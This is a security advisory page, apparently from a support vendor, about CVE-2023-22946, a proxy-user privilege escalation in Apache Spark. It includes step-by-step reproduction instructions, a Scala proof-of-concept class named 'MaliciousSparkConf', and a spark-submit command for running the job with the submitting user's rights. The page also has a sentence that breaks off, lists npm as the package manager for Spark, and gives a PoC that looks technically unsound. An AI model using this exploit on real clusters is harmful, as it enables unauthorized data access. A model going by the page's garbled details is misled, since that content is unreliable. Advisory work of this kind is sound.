CVE-2023-22946

Broken Access
Affects
Apache Spark
<3.4.0 >=3.3.0 <=3.3.1 >=3.2.0 <=3.2.3 >=3.1.0 <=3.1.3 >=3.0.0 <=3.0.3 >=2.4.8
in
Apache Spark
No items found.
Exclamation circle icon
Patch Available

This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs

‍Overview

Apache Spark is an open-source, distributed computing framework designed for big data processing and analytics, offering high-speed performance through in-memory computation and a unified engine for diverse workloads like batch processing, streaming, and machine learning.

With this exploit, a malicious user that has access to the proxy-user feature

Broken Access Control occurs when an application fails to properly enforce restrictions on what authenticated users are allowed to do, enabling attackers to access unauthorized functionality, data, or resources. It often stems from inadequate validation of user permissions, allowing someone to bypass intended security boundaries and perform actions beyond their assigned role.

Any of the following ramifications are possible:

  • Allowing arbitrary code execution
  • Complete system compromise
  • Data theft or exposure
  • Data manipulation or destruction
  • Privilege escalation, and
  • Denial of service.

Details

Module Info

Product: Apache Spark

Affected packages: Apache Spark

Affected versions:

<3.4.0
>=3.3.0 <=3.3.1
>=3.2.0 <=3.2.3
>=3.1.0 <=3.1.3
>=3.0.0 <=3.0.3
>=2.4.8 

GitHub Repo: N/A

Published packages: N/A

Package manager: npm

Vulnerability Info

This high-severity vulnerability is found in the main package of Apache Spark.

Steps To Reproduce

  1. Set up an Apache Spark environment that is vulnerable to this exploit, such as 3.3.1.
  2. Ensure the cluster supports the proxy-user feature and verify that spark.submit.proxyUser.allowCustomClasspathInClusterMode is either unset (defaults to true in vulnerable versions) or explicitly set to true. This allows custom classpaths in cluster mode.
  3. Create a submitting user, say Alice, with higher privileges (e.g., a service account or admin) who is authorized to submit Spark jobs and impersonate other users.
  4. Create a proxy-user with limited privileges, say Bob (e.g., a regular user account with restricted access).
  5. Configure authentication (e.g., Kerberos or a simple security plugin) to allow Alice to submit jobs as Bob via the proxy-user feature.
  6. Write a simple Spark application that includes malicious configuration-related classes in the application’s JAR file. For example:
    • Create a class that overrides Spark’s internal configuration or security context handling (e.g., a subclass of SparkConf or a custom SecurityManager).
    • Design the class to bypass the proxy-user’s privilege restrictions, forcing the application to inherit the submitting user’s (Alice’s) privileges.
    • It will look something like this:
import org.apache.spark.SparkConf
import org.apache.spark.sql.SparkSession
import java.security.Security

// Malicious subclass of SparkConf to manipulate configuration
class MaliciousSparkConf extends SparkConf {
  override def get(key: String, defaultValue: String): String = {
    // Override security-related properties to bypass proxy-user restrictions
    if (key == "spark.proxy.user" || key == "spark.security.credentials.user") {
      // Force the configuration to use the submitting user's identity (e.g., "alice")
      // instead of the proxy-user (e.g., "bob")
      System.getProperty("user.name") // Returns submitting user's name
    } else {
      super.get(key, defaultValue)
    }
  }

  override def set(key: String, value: String): SparkConf = {
    // Prevent proxy-user settings from being applied correctly
    if (key != "spark.proxy.user") {
      super.set(key, value)
    } else {
      super.set(key, System.getProperty("user.name")) // Override with submitting user
    }
  }
}

// Main application to exploit the vulnerability
object MaliciousApp {
  def main(args: Array[String]): Unit = {
    // Create the malicious configuration
    val conf = new MaliciousSparkConf()
      .setAppName("MaliciousApp")
      .setMaster("spark://<master-url>:7077") // Replace with your cluster master URL

    // Initialize SparkSession with the tampered configuration
    val spark = SparkSession.builder()
      .config(conf)
      .getOrCreate()

    try {
      // Test the effective privileges by performing an action
      val currentUser = System.getProperty("user.name")
      println(s"Running as user: $currentUser")

      // Example: Write to a file or perform an action only the submitting user can do
      spark.sparkContext.textFile("hdfs://<path-only-alice-can-access>")
        .saveAsTextFile("hdfs://<output-path>")

      println("Successfully executed with elevated privileges!")
    } catch {
      case e: Exception => println(s"Error (possibly due to privilege check): ${e.getMessage}")
    } finally {
      spark.stop()
    }
  }
}

  1. Use the spark-submit command to launch the application in cluster mode, specifying the proxy-user and including the malicious JAR in the classpath:
spark-submit --class com.example.MaliciousApp \
             --master spark://<master-url> \
             --proxy-user bob \
             --jars malicious-app.jar \
             malicious-app.jar

  1. Ensure the submission is done as the submitting user (Alice), either by running as Alice or using a tool like Livy that supports proxy-user submissions.
  2. Verify the exploit by ​​running the job and check the output. If successful, the application will execute with Alice’s privileges (the submitting user) instead of Bob’s (the proxy-user), despite the --proxy-user bob flag.

Addressing the Issue

Users of the affected components should apply one of the following mitigations:

  • Upgrade to a secure version of the software.
  • Sign up for post-EOL security support; HeroDevs customers get immediate access to a patched version of this software.

Credit(s)

  • Hideyuki Furue

Vulnerability Details
ID
CVE-2023-22946
PROJECT Affected
Apache Spark
Versions Affected
<3.4.0 >=3.3.0 <=3.3.1 >=3.2.0 <=3.2.3 >=3.1.0 <=3.1.3 >=3.0.0 <=3.0.3 >=2.4.8
Published date
April 9, 2025
≈ Fix date
April 17, 2023
Severity
Critical
Category
Broken Access
Sign up for the latest vulnerability alerts fixed in
Apache Spark NES
Rss feed icon
Subscribe via RSS
or
Thanks for signing up for our Newsletter! We look forward to connecting with you.
Oops! Something went wrong while submitting the form.